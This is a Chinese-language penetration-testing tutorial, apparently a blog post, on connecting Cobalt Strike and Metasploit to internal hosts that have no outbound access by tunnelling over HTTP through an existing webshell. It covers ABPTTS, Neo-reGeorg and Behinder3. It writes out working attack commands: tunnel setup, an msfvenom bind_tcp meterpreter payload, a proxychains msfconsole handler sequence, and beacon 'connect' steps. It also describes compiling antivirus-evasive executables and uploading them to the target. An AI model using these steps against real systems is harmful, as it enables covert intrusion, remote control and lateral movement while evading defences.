前言
太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,无法直接与公网的cobaltstrike或者metasploit服务端建立连接。只能搭建HTTP隧道,那能通过HTTP隧道上线cobaltstrike或者metasploit吗?pystinger 就可以做到,那除此之外呢?接下来,我们探究一下其他HTTP隧道工具能否上线cobaltstrike或者metasploit。
cobaltstrike
原理
原理图
image.png
本地win10先上线cobaltstrike作为跳板机,并产生父beacon。然后利用HTTP正向隧道连接目标Server 2008的目标端口,进而产生子beacon。这里需要端口对端口的映射。而HTTP正向代理工具只有 ABPTTS 满足这点。
复现环境
- CobaltStrike
公网 cobaltstrike 4.4
- 跳板机
系统:windows 10
IP地址:10.211.55.7
用户名:cseroad
- 目标机
系统:windows server 2008
IP地址:10.37.129.3
用户名:administrator
假设我们获取目标机server的webshell
image.png
然后利用 ABPTTS 项目生成代理脚本。因为它本身具有端口转发的功能。
该脚本只支持jsp、aspx。且每次生成的脚本文件并不一样。
生成代理脚本:
python abpttsfactory.py -o proxy
上传abptts.jsp到目标机server 2008 上。访问得到一串密文,说明脚本文件正常运行。
image.png
客户端使用abpttsclient.py启用HTTP隧道。
python abpttsclient.py -c proxy/config.txt -u "http://10.37.129.3:8080/demo/abptts.jsp" -f 127.0.0.1:6666/127.0.0.1:9999
/后面为目标地址和端口,前面为本地地址和端口。该命令意思是将目标机的9999端口通过http隧道映射至本机的6666端口,向本地的6666端口发送的请求都转发到目标机的9999端口上。
image.png
然后在cobaltstrike 上配置一条bind tcp 正向监听器。
image.png
值得注意的是生成的正向载荷只能选择Windows Executable Stageless 。
而Stager型和Stagerless型的区别在于:
- Stager型:只包含简单的加载逻辑部分,Stager通过将payload加载到内存里从而实现PE的加载,这种加载方式称为反射型DLL加载。
- Stagerless型:是把Stager和payload全写死在木马中,也就是它的体积更大、特征更明显。
image.png
只bin文件就有255K。
image.png
刚好最近更新了powershell的免杀插件,编译为exe后上传冰蝎。
image.png
木马在server 2008 目标机上开启了9999端口监听。
现在先在本地win 10上线cobaltstrike,产生一个父beacon。
image.png
而后在beacon里连接本地的6666端口。abpttsclient.py 就会通过HTTP隧道连接到9999端口上。
connect 127.0.0.1 6666
成功正向上线10.37.129.3目标机。
image.png
image.png
metasploit
原理
原理图
image.png
相比较cobaltstrike上线的原理,metasploit显得比较简单。kali建立HTTP隧道后,metasploit代理到内网,主动连接到目标机建立连接。
复现环境
- 跳板机
系统:kali
IP地址:10.211.55.6
用户名:root
- 目标机
系统:windows server 2008
IP地址:10.37.129.3
用户名:administrator
还是在存在一个shell的基础上,跳板机kali使用Neo-reGeorg代理工具。
image.png
检测代理正常建立后,创建正向连接的木马。相比较cobaltstrike,metasploit生成的后门方式就更多了。
以常见的c为例:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=8888 -f c -o shell.c
编译shell.c为免杀exe,并上传冰蝎后触发。
image.png
代理启用metasploit,配置RHOST为目标机IP地址。
proxychains msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set LPORT 8888
set RHOST 10.37.129.3
exploit -j -z
image.png
可接受到来自目标机server的session,成功建立会话。
image.png
Behinder3
原理
原理图
image.png
本地win10先上线cobaltstrike作为跳板机,并产生父beacon。然后利用冰蝎的HTTP正向隧道连接目标Server 2012的目标端口,进而产生子beacon。
复现环境
CobaltStrike
公网 cobaltstrike 4.4
跳板机
系统:windows 10
IP地址:10.211.55.7
用户名:cseroad
目标机
系统:windows server 2012
IP地址:10.37.129.4
用户名:administrator
现在不借助任何的HTTP隧道,只用Behinder3的内网穿透功能,同样将远程目标端口9999映射到本地6666端口。
配置如下:
image.png
现在我们在cobaltstrike上配置一条bind tcp 正向监听器并生成一个exe文件。
通过Behinder3上传并触发。
image.png
在父beaon输入
connect 127.0.0.1 6666
即可成功正向上线10.37.129.4目标机。
image.png
总结
以后再也不用担心不出网的情况下无法使用cobaltstrike或metasploit,借助HTTP隧道,让cobaltstrike或metasploit走正向代理连接到目标机。
参考资料
https://xz.aliyun.com/t/10410#toc-7
http://www.moy1sec.com/2021/11/02/cs-zai-bu-chu-wang-huan-jing-zhong-shang-xian/#toc-heading-6
http://events.jianshu.io/p/3c02bd778e55
网友评论